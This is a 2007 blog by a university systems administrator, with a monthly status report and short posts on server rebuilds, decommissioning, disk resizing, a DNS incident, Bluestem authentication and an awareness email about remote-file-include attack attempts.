September MAR

Peter Woods | AppHosting | Thursday, September 27th, 2007

Nagios Rebuild: I've rebuilt the replacement Nagios server, and it will soon go into testing phase. This server is built upon RHEL5 which introduced some challenges to the build process. Our RHN server does not yet offer RHEL5 so I had to sync with the official Redhat repository. As with any operating system upgrade, there are things functionally similar, yet are different in syntax and configuration. RHEL5 uses yum instead of up2date to manage the package updates. I had to experiment a little to find the yum command that performed the functions I needed to build the system. Some of the RHEL4 configuration did not carry directly over, and I had to modify the LDAP configuration. Again, this took some experimentation. On a good note, the core RHEL5 installation is very compact and secure. I found that I had to add packages to get to the web server base that I wanted. In the security arena, this is very good. The network security team has approved the virtual machine configuration, and it has been moved to the production network. I'm in the process on finalizing network diagrams and such for this work effort.

StudentOrgs Web Server Enhancement: The web servers for the student organizations were reconfigured to provide VUnetID authenticated web pages. A new virtual host to handle the SSL traffic was added, and the BlueStem authentication modules were installed on the server. This was the first installation of the BlueStem modules in the shared web environment. The first application to take advantage of this was the student government elections.

Mailgate CSM Development Environment: I assisted my coworkers in the building of a test mailgate environment behind the CSM. I also worked with our vendor to create the necessary accounts on the AppHosting bastion hosts so that they can become accustomed to the mailgate environment that we are building.

Updated AntiVirus: The antivirus engine on the shared web servers has been upgraded to allow the server to continue receiving the updates.

FEVS02 Decommissioning: The original FEVS02 web server has been decommissioned.  It was previously replaced with a pair of load balanced servers behind the CSM, and was no longer in use. The FEVS02 virtual machine was deleted from the ESX environment.

Samsara Decommissioning: Samsara is in the process of decommissioning. All services on this server have been disabled with the exception of SSH access and DHCP service for the IDEV network. The full decommissioning is scheduled for the beginning of October.

Operational Issues: My operational duties typically involve resolving Magic tickets related to the Unix/Linux servers, creation of the weekly AppHosting incident report, service monitoring audit. These are the major operational issues that I've worked on this month.

  • Web Server RewriteRules: I implemented several iterations of RewriteRules at the request of the content owners.
  • RFI Communication: In performing the period review of the web server access and error logs, I noticed that several of the shared servers were receiving a noticeable number of remote file include (RFI) attacks. In this type of attack, the attacker attempts to include content from a remote server to gain elevated privileges on the target server. With the help of partner support, an informational email with recommendations was sent to the web-spiders mailing list.
  • DNS Incident: I became involved in this incident the following day to do some investigative work to determine the cause of the performance issue. There were no scheduled changes related to the DNS servers or the the network equipment that affects them, and no breakfixes were called in during this time window. System logs did not indicate any unusual traffic during the incident window. With assistance from the network security team we able to identify a misconfigured upstream DNS server which amplified certain requests for certain names to the point of resource saturation on the VU DNS servers.
  • Web Services Incident: A web services customer called stating that users of their website were experiencing frequent errors. I consolidated the error logs for both load balanced servers and performed a detailed log file analysis for the customer. The log files indicated that several of the main pages were attempting to include a non-existent supporting PHP page. Based on the name of the missing file, this page was probably intend to provide additional functionality to the calling page. I did not investigate the specific side affects of the missing page, but instead reported that the target file was missing. Additionally, the specific has an unusually large number of files in one directory, and this is causing issues with the replication scripts. The replication issue affects only this particular site. There were also several MySQL errors in the PHP code for the site.
  • Server Resizing: The pair of load balanced servers that handle the miscellaneous vanity URLs reached 80% capacity in the content file system. This server has 63 virtual hosts containing content for quiet a few departments across campus. Because of the load balanced web servers, the web presence for these sites was available during the change. The secondary server was shutdown to add another virtual disk to the virtual machine and the powered back on. Once the server was back online, the content file system was grown live. The procedure was repeated for the primary server. Since SFTP upload are pointed at the primary server only, content updates were not available during reboot of the primary server. The total operation to reconfigure both virtual machines and grow the files system took approximately 25 minutes to perform.
  • NetTracker Data Archival: I deleted 2004 data from NetTracker, and archived the 2005 data. This process took approximately 40 hours to complete. There is a nice feature in the output of the archive command that only displays the first and last months that specified to be archived. This behavior is different than the delete command which provides output for each specified month. 

Almost Forgot

Peter Woods | Miscellaneous | Tuesday, September 25th, 2007

Two nights ago my five year old daughter asked for a "real" computer.  After a quick scan through the collection, she get the old iMac. It was the only one that I had around with a monitor. I did a quick Ubuntu update, and it was ready to go. As it was rebooting, she asked: "Daddy is this when I type my name and password?" Gotta love it.

Server Resizing

Peter Woods | Web Services | Monday, September 24th, 2007

The servers that handle the vanity domains (61 virtual hosts) have been resized to accommodate the recent content growth.  The content file system was hovering around 80% which means that it would be full relatively soon. The change was done with very little impact to the websites.  In fact, the web presence was available throughout the entire process by keeping one server in the load balanced pair online. Another 32GB virtual disk was added to each server, and the content file system was extended. Each server had to be momentarily shutdown to add the new virtual disk. Once the server was powered back up and all services were restarted, the live file system was extended. It took about 25 minutes to double the size of two servers.

StudentOrgs Bluestem

Peter Woods | Web Services | Friday, September 14th, 2007

Bluestem authentication has been setup on the StudentOrgs webserver, which means the server now supports SSL. I'll need to update some documentation to reflect these changes.

RFI Communication

Peter Woods | Web Services | Wednesday, September 12th, 2007

The communication for the steady stream of RFI attempts has gone out to the Spiders mailing list.  This was basically an awareness email so that developers are mindful of what their code has to endure.

Things I Learned At 3AM…

Peter Woods | AppHosting | Tuesday, September 4th, 2007

Here are a few things that I learned during the the ESX upgrade this weekend:

  1. "File — File server" is not a good name for a VM.  I kept wondering: Who would the NOC call if there was a problem with this VM?
  2. 30 minute Vmotions are not cool.  A handful of the VMs to 15-30 minutes to move.  It gets a little unnerving sitting at 94% for that long.
  3. Once the esxupdate is started, the admin is merely an observer.  My Comcast connection dropped out during the middle of an update, and the update continued on its own even though my shell dropped out from under it.

I also learned that there is a bug in the output of the NetTracker archive function.  The -remove option generates a message for month in the list.  The -archive option only generates messages for the first and last months of the list.  I fully expected to see that only the first and last months had been archived when it completed.  Luckily this was not the case.